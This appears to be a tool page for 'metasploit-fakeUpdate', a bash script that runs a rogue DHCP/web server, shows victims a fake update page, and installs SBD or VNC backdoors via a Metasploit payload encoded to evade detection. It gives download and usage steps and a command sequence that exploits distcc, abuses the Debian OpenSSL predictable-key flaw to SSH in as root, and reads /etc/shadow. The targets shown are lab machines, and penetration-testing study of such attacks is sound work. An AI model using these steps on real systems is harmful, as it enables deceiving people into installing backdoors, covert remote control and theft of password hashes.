metasploit-fakeUpdate[v0.1.4].sh

This is a bash script to automate 'Manning in the Middle' to 'pwn' whoever it can, via giving them a "Fake Update" screen. The attack is transparent (allowing the target to afterwards surf the inter-webs once they have been exploited!), and the payload is either SBD (Secure BackDoor - similar to netcat!), VNC (remote desktop) or whatever the attacker wishes to use.

Links

Watch video on-line:

Download video: http://download.g0tmi1k.com/videos_archive/metasploit-FakeUpdate_v0.1.mp4

Method

  • Sets up a DHCP and web server.
  • Creates an exploit with Metasploit.
  • Waits for the target to connect, download and run the exploit.
  • Once successfully exploited it grants access to allow the target to surf the inter-webs.
  • Uploads a backdoor; SBD or VNC, via the exploit.
  • The attacker has the option to run a few 'sniffing' programs (from the dnsiff suite) to watch what the target does!

Tools

  • A network with client
  • An Internet connection (though you could modify it so its non transparent)
  • dhcpd3, apache, Metasploit, dnsiff suite --- All on BackTrack
  • The script! metasploit-fakeUpdate[v0.1.4].tar.gz (489 KB, SHA1: aac4554f2d09e2a3f1b1061abe3759d445771b5e)

Whats in the tar.gz?

  • metasploit-fakeUpdate.sh --- Bash script
  • www/index.php --- The page the target is forced to see before they have access to the Internet.
  • www/sbd.exe --- SBD Backdoor
  • www/winvnc.exe, vnchooks.dll, vnc.reg --- VNC Backdoor
  • www/Linux.jpg, OSX.jpg, Windows.jpg --- OS Pictures
  • www/favicon.ico, animated_favicon1.gif --- FavIcons

How to use it?

  1. Extract the tar.gz file (via tar zxf metasploit-fakeUpdate[v0.1.4].tar.gz).
  2. Copy the "www" folder to /var/www (cp www/* /var/www/)
  3. Make sure to "Start Network" and to have an IP address. (via start-network and dhclient [Internet Interface])
  4. Edit metasploit-fakeupdate.sh with your "internet"interface. (You can view your interfaces via ifconfig and use kate to edit the file.)
  5. bash metasploit-fakeupdate.sh (don't forget to be in the correct folder!)
  6. Wait for a connection...
  7. ...Game Over.

Commands

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
nmap 192.168.1.1/24
nmap -sS -sV -p1-65535 -O -f -n -v 192.168.1.105
msfconsole
search distcc
use exploit/unix/misc/distcc_exec
show options
setg RHOST 192.168.1.105
show payloads
setg payload generic/cmd/unix/bind_perl
show options
exploit
ls
whoami
ls -lart/root
ls -lart/root/ .ssh
cat /root/.ssh/authorized_keys
 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE kcP Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc Wv8Vw7bwkf 1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable
Firefox www.exploit-db.com -> Debian OpenSSL Predictable (5720) ->
tar jxvf debian_ssh_rsa_2048_x86.tar.bz2
cd rsa/2048/
grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE kcP Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc Wv8Vw7bwkf 1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w *.pub
ssh -i 57c3115d77c56390332dc5c49978627a-5429 root@192.168.1.105
whoami
hostname
ifconfig
cat /etc/shadow

Notes

  • Based on fakeAP_pwn.
  • The video uses metasploit-fakeUpdate.sh v0.1
  • It's worth doing this "manually" (without the script) before using the script, so you have an idea of what's happening, and why. The script is only meant to save time.
  • I'm running BackTrack 4 Final in VM, The target is running Windows XP Pro SP3 (fully up-to-date 2010-05-13), with no firewall and no AV.
  • The connection is reversed - so the connection comes from the target to the attacker, therefore, as the attacker is the server, it could help out with firewalls...
  • As you can see in the code, one day I plan for this to also "affect" Linux and/or OSX... but its taken me this long to update it - so don't hold your breath!

Song: DJ Mummy vs Sean Paul - Nuttin No Go So (Bubbling Remix)

Video length: 3:20

Capture length: 7:59

Blog Post: https://blog.g0tmi1k.com/2010/06/script-video-metasploit-fakeupdate/

v0.1.4

  • [+] Added arguments
  • [+] Can detect and uses broadcast address if needed
  • [+] Checks for superuser
  • [+] Checks interfaces/paths/files exists
  • [+] Randomizes ports each time
  • [+] Reversed the VNC connection
  • [+] Stops and removes any existent backdoors
  • [+] Stops any services and/or programs currently running
  • [+] Uses “msfencode” - to prevent detection
  • [+] Webpage now has a "favicon"
  • [>] Fix a few minor features - Couple of silly typos
  • [>] General code improvements
  • [>] Improved "clean up" code
  • [>] Improved checking the targets IP Address
  • [>] Renamed the backdoor files
  • [>] Renamed the output windows
  • [>] Updated the help message
  • [>] Waits a little bit longer in places

v0.1.2

  • [+] Fix Gateway Bug
  • [+] Checks for other index files. And acts on it.
  • [+] Checks to make sure user copied www/. Else acts on it.
  • [+] Added more tools to "extra".
  • [+] Added extra settings
  • [>] Aligned the output windows
  • [>] General code improvements
  • [>] Improved debug info
  • [>] "Started" work on allow a custom backdoor Needs more work - Removed Linux/OSX was confusing people

v0.1.1

  • [+] First public release